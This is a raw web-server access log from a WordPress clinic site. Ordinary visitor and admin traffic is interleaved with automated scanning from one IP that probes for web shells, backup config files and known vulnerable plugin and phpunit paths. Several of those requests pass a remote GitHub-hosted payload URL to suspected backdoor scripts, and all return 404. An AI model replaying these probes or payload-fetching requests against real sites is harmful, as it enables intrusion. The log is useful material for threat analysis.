69.71.12.248 - - [03/Nov/2022:07:55:09 -0700] "GET /wp-content/uploads/2022/10/heatingpad-1.png HTTP/1.1" 200 20389 "https://wellnessconceptsclinic.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Mobile/15E148 Safari/604.1" "wellnessconceptsclinic.com"
69.71.12.248 - - [03/Nov/2022:07:55:09 -0700] "GET /wp-content/uploads/2022/01/MCR-Acu-pic.png HTTP/1.1" 200 23193 "https://wellnessconceptsclinic.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Mobile/15E148 Safari/604.1" "wellnessconceptsclinic.com"
69.71.12.248 - - [03/Nov/2022:07:55:09 -0700] "GET /wp-content/uploads/2021/05/185300231_1124006634769468_196384368853979452_n.jpg HTTP/1.1" 200 146243 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Mobile/15E148 Safari/604.1" "wellnessconceptsclinic.com"
69.71.12.248 - - [03/Nov/2022:07:55:09 -0700] "GET /wp-includes/css/dist/block-library/style.min.css?ver=5.9.5 HTTP/1.1" 200 11206 "https://wellnessconceptsclinic.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Mobile/15E148 Safari/604.1" "wellnessconceptsclinic.com"
69.71.12.248 - - [03/Nov/2022:07:55:09 -0700] "GET /wp-content/uploads/2021/02/cropped-IMG_9103_1.14760356_std-2-192x192.jpg HTTP/1.1" 200 5530 "https://wellnessconceptsclinic.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Mobile/15E148 Safari/604.1" "wellnessconceptsclinic.com"
69.71.12.248 - - [03/Nov/2022:07:55:09 -0700] "GET /wp-content/uploads/2021/02/cropped-IMG_9103_1.14760356_std-2-32x32.jpg HTTP/1.1" 200 1164 "https://wellnessconceptsclinic.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Mobile/15E148 Safari/604.1" "wellnessconceptsclinic.com"
69.71.12.248 - - [03/Nov/2022:07:55:09 -0700] "GET /wp-content/themes/Divi/includes/builder/images/marker.png HTTP/1.1" 200 1940 "https://wellnessconceptsclinic.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Mobile/15E148 Safari/604.1" "wellnessconceptsclinic.com"
65.118.108.130 - - [03/Nov/2022:07:55:06 -0700] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 416 "https://wellnessconceptsclinic.com/?et_fb=1&et_bfb=1&PageSpeed=off" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0" "wellnessconceptsclinic.com"
69.71.12.248 - - [03/Nov/2022:07:55:15 -0700] "GET /wp-content/uploads/2022/10/October-1-2022-980x555.jpg HTTP/1.1" 200 63379 "https://wellnessconceptsclinic.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Mobile/15E148 Safari/604.1" "wellnessconceptsclinic.com"
69.71.12.248 - - [03/Nov/2022:07:55:19 -0700] "GET /wp-content/uploads/2019/03/acupuncture-springfield-2019-drk.png HTTP/1.1" 200 19653 "https://wellnessconceptsclinic.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Mobile/15E148 Safari/604.1" "wellnessconceptsclinic.com"
85.31.46.140 - - [03/Nov/2022:07:55:21 -0700] "GET /boom.php?x HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "wellnessconceptsclinic.com"
85.31.46.140 - - [03/Nov/2022:07:55:55 -0700] "GET /wp-content/plugins/backup_index.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "wellnessconceptsclinic.com"
85.31.46.140 - - [03/Nov/2022:07:55:59 -0700] "GET /wp-content/db_cache.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "wellnessconceptsclinic.com"
85.31.46.140 - - [03/Nov/2022:07:56:35 -0700] "GET /xmlrp.php?url=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1 HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "wellnessconceptsclinic.com"
85.31.46.140 - - [03/Nov/2022:07:56:40 -0700] "GET /wpindex.php?idb=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1 HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "wellnessconceptsclinic.com"
85.31.46.140 - - [03/Nov/2022:07:56:56 -0700] "GET /larva.php?idb=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1 HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "wellnessconceptsclinic.com"
65.118.108.130 - - [03/Nov/2022:07:56:54 -0700] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 98 "https://wellnessconceptsclinic.com/wp-admin/post.php?post=9&action=edit" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0" "wellnessconceptsclinic.com"
119.237.81.29 - - [03/Nov/2022:07:56:58 -0700] "POST /wp-login.php HTTP/1.1" 200 7593 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" "wellnessconceptsclinic.com"
85.31.46.140 - - [03/Nov/2022:07:57:14 -0700] "GET /th3_err0r.php?php=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1 HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "wellnessconceptsclinic.com"
65.118.108.130 - - [03/Nov/2022:07:57:07 -0700] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 416 "https://wellnessconceptsclinic.com/?et_fb=1&et_bfb=1&PageSpeed=off" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0" "wellnessconceptsclinic.com"
85.31.46.140 - - [03/Nov/2022:07:57:30 -0700] "GET /alfindex.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "wellnessconceptsclinic.com"
85.31.46.140 - - [03/Nov/2022:07:57:39 -0700] "GET /alfa.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "wellnessconceptsclinic.com"
85.31.46.140 - - [03/Nov/2022:07:58:15 -0700] "GET /wp-booking.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "wellnessconceptsclinic.com"
85.31.46.140 - - [03/Nov/2022:07:58:32 -0700] "GET /cindex.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "wellnessconceptsclinic.com"
85.31.46.140 - - [03/Nov/2022:07:58:36 -0700] "GET /wp-content/wp-1ogin_bak.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "wellnessconceptsclinic.com"
85.31.46.140 - - [03/Nov/2022:07:58:43 -0700] "GET /wp-1ogin_bak.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "wellnessconceptsclinic.com"
91.201.215.19 - - [03/Nov/2022:07:58:42 -0700] "POST /xmlrpc.php HTTP/1.1" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96" "wellnessconceptsclinic.com"
85.31.46.140 - - [03/Nov/2022:07:58:58 -0700] "GET /wp-includes/fonts/css.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "wellnessconceptsclinic.com"
65.118.108.130 - - [03/Nov/2022:07:58:54 -0700] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 98 "https://wellnessconceptsclinic.com/wp-admin/post.php?post=9&action=edit" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0" "wellnessconceptsclinic.com"
85.31.46.140 - - [03/Nov/2022:07:59:04 -0700] "GET /wp-includes/css/css.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "wellnessconceptsclinic.com"
65.118.108.130 - - [03/Nov/2022:07:59:07 -0700] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 416 "https://wellnessconceptsclinic.com/?et_fb=1&et_bfb=1&PageSpeed=off" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0" "wellnessconceptsclinic.com"
85.31.46.140 - - [03/Nov/2022:07:59:44 -0700] "GET /config.bak.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "wellnessconceptsclinic.com"
85.31.46.140 - - [03/Nov/2022:07:59:47 -0700] "GET /wp-admin/config.bak.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "wellnessconceptsclinic.com"
65.118.108.130 - - [03/Nov/2022:07:59:49 -0700] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 98 "https://wellnessconceptsclinic.com/wp-admin/post.php?post=9&action=edit" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0" "wellnessconceptsclinic.com"
65.118.108.130 - - [03/Nov/2022:08:00:07 -0700] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 416 "https://wellnessconceptsclinic.com/?et_fb=1&et_bfb=1&PageSpeed=off" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0" "wellnessconceptsclinic.com"
85.31.46.140 - - [03/Nov/2022:08:00:35 -0700] "GET /wp-includes/config.bak.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "wellnessconceptsclinic.com"
65.118.108.130 - - [03/Nov/2022:08:00:39 -0700] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 98 "https://wellnessconceptsclinic.com/wp-admin/post.php?post=9&action=edit" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0" "wellnessconceptsclinic.com"
85.31.46.140 - - [03/Nov/2022:08:00:49 -0700] "GET /wp-content/themes/config.bak.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "wellnessconceptsclinic.com"
65.118.108.130 - - [03/Nov/2022:08:00:54 -0700] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 98 "https://wellnessconceptsclinic.com/wp-admin/post.php?post=9&action=edit" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0" "wellnessconceptsclinic.com"
65.118.108.130 - - [03/Nov/2022:08:00:04 -0700] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 706 "https://wellnessconceptsclinic.com/wp-admin/post.php?post=9&action=edit" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0" "wellnessconceptsclinic.com"
65.118.108.130 - - [03/Nov/2022:08:01:07 -0700] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 163 "https://wellnessconceptsclinic.com/?et_fb=1&et_bfb=1&PageSpeed=off" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0" "wellnessconceptsclinic.com"
85.31.46.140 - - [03/Nov/2022:08:01:16 -0700] "GET /wp-content/plugins/config.bak.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "wellnessconceptsclinic.com"
85.31.46.140 - - [03/Nov/2022:08:01:30 -0700] "POST /wp-includes/css/wp-config.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "wellnessconceptsclinic.com"
85.31.46.140 - - [03/Nov/2022:08:01:33 -0700] "GET /wp-content/plugins/ubh/up.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "wellnessconceptsclinic.com"
85.31.46.140 - - [03/Nov/2022:08:01:38 -0700] "GET /wp-includes/wpconfig.bak.php?act=sf HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "wellnessconceptsclinic.com"
185.2.5.31 - - [03/Nov/2022:08:01:37 -0700] "POST /wp-login.php HTTP/1.1" 200 7555 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36 MVisionPlayer/1.0.0.0" "wellnessconceptsclinic.com"
85.31.46.140 - - [03/Nov/2022:08:01:48 -0700] "GET /wp-content/plugins/wpconfig.bak.php?act=sf HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "wellnessconceptsclinic.com"
85.31.46.140 - - [03/Nov/2022:08:02:04 -0700] "GET /haders.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "wellnessconceptsclinic.com"
85.31.46.140 - - [03/Nov/2022:08:02:17 -0700] "GET /wp-content/wp-old-index.php?action=login&pass=-1&submit= HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "wellnessconceptsclinic.com"
65.118.108.130 - - [03/Nov/2022:08:02:13 -0700] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 98 "https://wellnessconceptsclinic.com/wp-admin/post.php?post=9&action=edit" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0" "wellnessconceptsclinic.com"
85.31.46.140 - - [03/Nov/2022:08:02:19 -0700] "GET /legion.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "wellnessconceptsclinic.com"
65.118.108.130 - - [03/Nov/2022:08:02:13 -0700] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 163 "https://wellnessconceptsclinic.com/?et_fb=1&et_bfb=1&PageSpeed=off" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0" "wellnessconceptsclinic.com"
85.31.46.140 - - [03/Nov/2022:08:02:24 -0700] "GET /wp-content/mu-plugins/db-safe-mode.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "wellnessconceptsclinic.com"
85.31.46.140 - - [03/Nov/2022:08:02:41 -0700] "GET /wp-includes/lfx.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "wellnessconceptsclinic.com"
85.31.46.140 - - [03/Nov/2022:08:02:48 -0700] "GET /wp-includes/small.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "wellnessconceptsclinic.com"
85.31.46.140 - - [03/Nov/2022:08:03:06 -0700] "GET /upload.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "wellnessconceptsclinic.com"
85.31.46.140 - - [03/Nov/2022:08:03:28 -0700] "GET /config.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "wellnessconceptsclinic.com"
85.31.46.140 - - [03/Nov/2022:08:03:35 -0700] "GET /test.php?Ghost=send HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "wellnessconceptsclinic.com"
85.31.46.140 - - [03/Nov/2022:08:03:41 -0700] "GET /wp-content/langar.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "wellnessconceptsclinic.com"
85.31.46.140 - - [03/Nov/2022:08:03:54 -0700] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "wellnessconceptsclinic.com"
85.31.46.140 - - [03/Nov/2022:08:04:02 -0700] "GET /wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "wellnessconceptsclinic.com"
65.118.108.130 - - [03/Nov/2022:08:04:14 -0700] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 98 "https://wellnessconceptsclinic.com/wp-admin/post.php?post=9&action=edit" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0" "wellnessconceptsclinic.com"
65.118.108.130 - - [03/Nov/2022:08:04:14 -0700] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 416 "https://wellnessconceptsclinic.com/?et_fb=1&et_bfb=1&PageSpeed=off" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0" "wellnessconceptsclinic.com"
10.247.24.102 - - [03/Nov/2022:08:04:18 -0700] "POST /wp-cron.php?doing_wp_cron=1667487858.4296410083770751953125 HTTP/1.1" 200 - "https://wellnessconceptsclinic.com/wp-cron.php?doing_wp_cron=1667487858.4296410083770751953125" "WordPress/5.9.5; https://wellnessconceptsclinic.com" "wellnessconceptsclinic.com"
161.97.90.224 - - [03/Nov/2022:08:04:19 -0700] "POST /xmlrpc.php HTTP/1.1" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96" "wellnessconceptsclinic.com"
85.31.46.140 - - [03/Nov/2022:08:04:26 -0700] "GET /wp-content/plugins/wpdiscuz/themes/default/style-rtl.css HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "wellnessconceptsclinic.com"
65.118.108.130 - - [03/Nov/2022:08:06:01 -0700] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 98 "https://wellnessconceptsclinic.com/wp-admin/post.php?post=9&action=edit" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0" "wellnessconceptsclinic.com"
65.118.108.130 - - [03/Nov/2022:08:06:01 -0700] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 163 "https://wellnessconceptsclinic.com/?et_fb=1&et_bfb=1&PageSpeed=off" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0" "wellnessconceptsclinic.com"
65.118.108.130 - - [03/Nov/2022:08:06:16 -0700] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 98 "https://wellnessconceptsclinic.com/wp-admin/post.php?post=9&action=edit" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0" "wellnessconceptsclinic.com"
65.118.108.130 - - [03/Nov/2022:08:06:31 -0700] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 98 "https://wellnessconceptsclinic.com/wp-admin/post.php?post=9&action=edit" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0" "wellnessconceptsclinic.com"
65.118.108.130 - - [03/Nov/2022:08:06:50 -0700] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 98 "https://wellnessconceptsclinic.com/wp-admin/post.php?post=9&action=edit" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0" "wellnessconceptsclinic.com"
65.118.108.130 - - [03/Nov/2022:08:07:00 -0700] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 416 "https://wellnessconceptsclinic.com/?et_fb=1&et_bfb=1&PageSpeed=off" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0" "wellnessconceptsclinic.com"
65.118.108.130 - - [03/Nov/2022:08:07:06 -0700] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 98 "https://wellnessconceptsclinic.com/wp-admin/post.php?post=9&action=edit" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0" "wellnessconceptsclinic.com"
192.82.245.235 - - [03/Nov/2022:08:07:14 -0700] "GET / HTTP/1.1" 301 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26" "www.wellnessconceptsclinic.com"
3.208.234.236 - - [03/Nov/2022:08:07:20 -0700] "GET / HTTP/1.1" 301 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26" "www.wellnessconceptsclinic.com"
192.82.245.235 - - [03/Nov/2022:08:07:20 -0700] "GET / HTTP/1.1" 200 185330 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26" "wellnessconceptsclinic.com"
192.82.245.235 - - [03/Nov/2022:08:07:28 -0700] "GET /wp-content/plugins/tabs-responsive/assets/css/bootstrap-front.css?ver=5.9.5 HTTP/1.1" 200 2640 "https://wellnessconceptsclinic.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26" "wellnessconceptsclinic.com"
192.82.245.235 - - [03/Nov/2022:08:07:28 -0700] "GET /wp-content/plugins/wp-yelp-review-slider/public/css/wprev-public_template1.css?ver=6.3 HTTP/1.1" 200 1198 "https://wellnessconceptsclinic.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26" "wellnessconceptsclinic.com"
192.82.245.235 - - [03/Nov/2022:08:07:28 -0700] "GET /wp-content/plugins/wp-yelp-review-slider/public/css/wprs_unslider.css?ver=6.3 HTTP/1.1" 200 533 "https://wellnessconceptsclinic.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26" "wellnessconceptsclinic.com"
192.82.245.235 - - [03/Nov/2022:08:07:28 -0700] "GET /wp-content/plugins/wp-facebook-reviews/public/css/wprev-fb-combine.css?ver=11.0 HTTP/1.1" 200 1859 "https://wellnessconceptsclinic.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26" "wellnessconceptsclinic.com"
192.82.245.235 - - [03/Nov/2022:08:07:28 -0700] "GET /wp-content/plugins/wp-yelp-review-slider/public/css/wprs_unslider-dots.css?ver=6.3 HTTP/1.1" 200 247 "https://wellnessconceptsclinic.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26" "wellnessconceptsclinic.com"
192.82.245.235 - - [03/Nov/2022:08:07:28 -0700] "GET /wp-content/plugins/tabs-responsive/assets/css/font-awesome/css/font-awesome.min.css?ver=5.9.5 HTTP/1.1" 200 4696 "https://wellnessconceptsclinic.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26" "wellnessconceptsclinic.com"
192.82.245.235 - - [03/Nov/2022:08:07:28 -0700] "GET /wp-content/uploads/wtfdivi/wp_head.css?ver=1620759003 HTTP/1.1" 200 441 "https://wellnessconceptsclinic.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26" "wellnessconceptsclinic.com"
192.82.245.235 - - [03/Nov/2022:08:07:28 -0700] "GET /wp-content/plugins/z-url-preview/zurlplugin.css?ver=5.9.5 HTTP/1.1" 200 20 "https://wellnessconceptsclinic.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26" "wellnessconceptsclinic.com"
192.82.245.235 - - [03/Nov/2022:08:07:28 -0700] "GET /wp-content/plugins/wp-yelp-review-slider/public/css/wpyelp_w3.css?ver=6.3 HTTP/1.1" 200 499 "https://wellnessconceptsclinic.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26" "wellnessconceptsclinic.com"
192.82.245.235 - - [03/Nov/2022:08:07:28 -0700] "GET /wp-content/plugins/tabs-responsive/assets/css/animate.css?ver=5.9.5 HTTP/1.1" 200 4936 "https://wellnessconceptsclinic.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26" "wellnessconceptsclinic.com"
